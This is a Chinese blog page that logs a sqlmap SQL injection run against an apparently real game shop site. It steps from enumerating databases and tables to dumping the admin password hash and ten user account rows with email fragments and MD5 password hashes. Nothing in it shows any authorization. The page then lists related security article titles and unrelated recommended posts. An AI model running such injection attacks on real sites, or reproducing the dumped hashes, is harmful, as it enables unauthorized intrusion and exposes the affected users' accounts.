某网SQL注入漏洞实战
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs
available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库
current database: 'dnweb'
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user: 'root@localhost'
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名
Database: dnweb
[25 tables]
+-----------------+
| account |
| admin_user |
| base |
| chajian |
| chongzhi |
| duihuan |
| libao_jilu |
| libao_list |
| meirilibao |
| meirilibao_jilu |
| mianfei |
| mianfei_list |
| money_name |
| role_dellist |
| roleid |
| server |
| shop_list |
| shop_list_copy |
| shop_tag |
| tuiguang |
| xiaofei |
| zhuce |
| zkfcn |
| zkfcq |
| zkfwp |
+-----------------+
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名
Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name,admin_pass " -T "admin_user" -D "dnweb"
#列数据
Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass |
+------------+----------------------------------+
| lok** | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+
Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| createtime | datetime |
| dlts | int(11) |
| email | varchar(255) |
| gold | int(10) |
| id | int(10) |
| jifen | int(10) |
| lastip | varchar(16) |
| logintime | datetime |
| lxdl | int(11) |
| money | int(10) |
| money2 | int(10) |
| name | varchar(32) |
| namemd5id | varchar(32) |
| password | varchar(32) |
| regip | varchar(16) |
| security | varchar(32) |
| tg | int(10) |
| tg2 | int(10) |
| tingyong | int(11) |
| vip | int(255) |
+------------+--------------+
+-------+------------+-------------+----------------------------------+----------+
| id | email | name | password | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350* | a414409798 | cee4fce6eaa87581421c296cbc0d3064 | NULL |
| 11828 | 000000 | lo*** | 670b14728ad9902aecba32e22fa4f6bd** | NULL |
| 11829 | 8888* | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL |
| 11830 | 123456 | 203412594* | cfd40caa535bb51378ab60849bb54486 | NULL |
| 11831 | 123456789 | na101* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11832 | NULL | hyt100* | 4c49c824492864666980b012bcf17d08 | NULL |
| 11833 | 32312* | hehe52121* | 0733f98f76375074a3424d5b6e8ffd68 | NULL |
| 11834 | 123456789* | fong201* | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL |
| 11835 | 123456 | q50504* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11836 | 1* | wf199* | 96e79218965eb72c92a549dd5a330112 | NULL |
+-------+------------+-------------+----------------------------------+----------+
某网SQL注入漏洞实战的更多相关文章
- 【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析
0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...
- 【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析
0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...
- 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析
0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...
- 【代码审计】XIAOCMS_后台database.php页面存在SQL注入漏洞
0x00 环境准备 XIAOCMS官网: http://www.xiaocms.com/ 网站源码版本:XiaoCms (发布时间:2014-12-29) 程序源码下载:http://www.xi ...
- sql注入学习笔记,什么是sql注入,如何预防sql注入,如何寻找sql注入漏洞,如何注入sql攻击 (原)
(整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文章最后关于如何预防sql注入) (整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文 ...
- sqlmap检测sql注入漏洞
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 官网:http://sqlmap.org/ 乌 ...
- 【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入 漏洞分析
0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...
- 【代码审计】iZhanCMS_v2.1 前台GoodsController.php页面存在SQL注入漏洞分析
0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...
- 【代码审计】iZhanCMS_v2.1 后台存在多个SQL注入漏洞分析
0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...
随机推荐
- 蓝凌表单的表体调用Javascript
应用场景:像请假类表单会在从表输入开始时间.结束时间等字段 需求1:客户希望根据开始.结束时间自动计算小时数 解决方法: 1.主表单增加一行,设三个字段[开始时间合计].[结束时间合计].[开始结束时 ...
- Unity 模型导入导出
从3DMAX导出,参考: http://tieba.baidu.com/p/2807225555 -> 使用3dmax 2013,会自带导出 fbx 的功能 -> 从 3dmax 导出 - ...
- Hadoop第9周练习—Hive部署测试(含MySql部署)
1.1 2 :搭建Hive环境 内容 2.2 3 运行环境说明 1.1 硬软件环境 线程,主频2.2G,6G内存 l 虚拟软件:VMware® Workstation 9.0.0 build-8 ...
- fis3使用环境
1.全局安装nodejs 2.安装http-server npm install http-server -g 3.安装fis3 npm install -g fis3 如要限制版本号写法是:npm ...
- python编码声明的位置很重要
python在3.x版本之前,编码一直是一个很头痛的问题.在代码中如果要使用中文,通常都要在文件的头部注明# -*- coding:utf-8 -*- 这样IDE或者解释器才会智能的转换编码. 这其中 ...
- 性能测试类,让你写法代码养成经常测试的好习惯 -ASP.NET C#
介绍: 可以很方便的在代码里循环执行 需要测试的函数 自动统计出执行时间,支持多线程. 使用方法: PerformanceTest p = new PerformanceTest(); p.SetC ...
- WebGL 3D on iOS8 正式版
今天iOS8终于正式发布了,升级了手头设备后对我来说最重要的就是测试WebGL的3D是否真的能跑苹果的系统了,跑了多个HT for Web的3D例子都非常流畅,比Android刚支持WebGL时好太多 ...
- ActiveMQ学习(四)——应用程序接口
在 Java 里有 JMS的多个实现.其中 apache 下的 ActiveMQ就是不错的选择. 用 ActiveMQ最好还是了解下 JMS JMS 公共 点对点域 发布/订阅域 Connection ...
- WatiN框架学习二——对弹窗的处理
以IE为例,WatiN处理弹出窗口: IE ie = new IE("string"); //打开指定web页 ie.Button(Find.ById("string&q ...
- 在MVC视图的代码块中,直接输出文本,有几种方式?
@{ <div>我爱IT,我是程序员,我骄傲---</div> <!--在C#代码块中,输出文本--> <!--1.0 使用Razor内置标签text--&g ...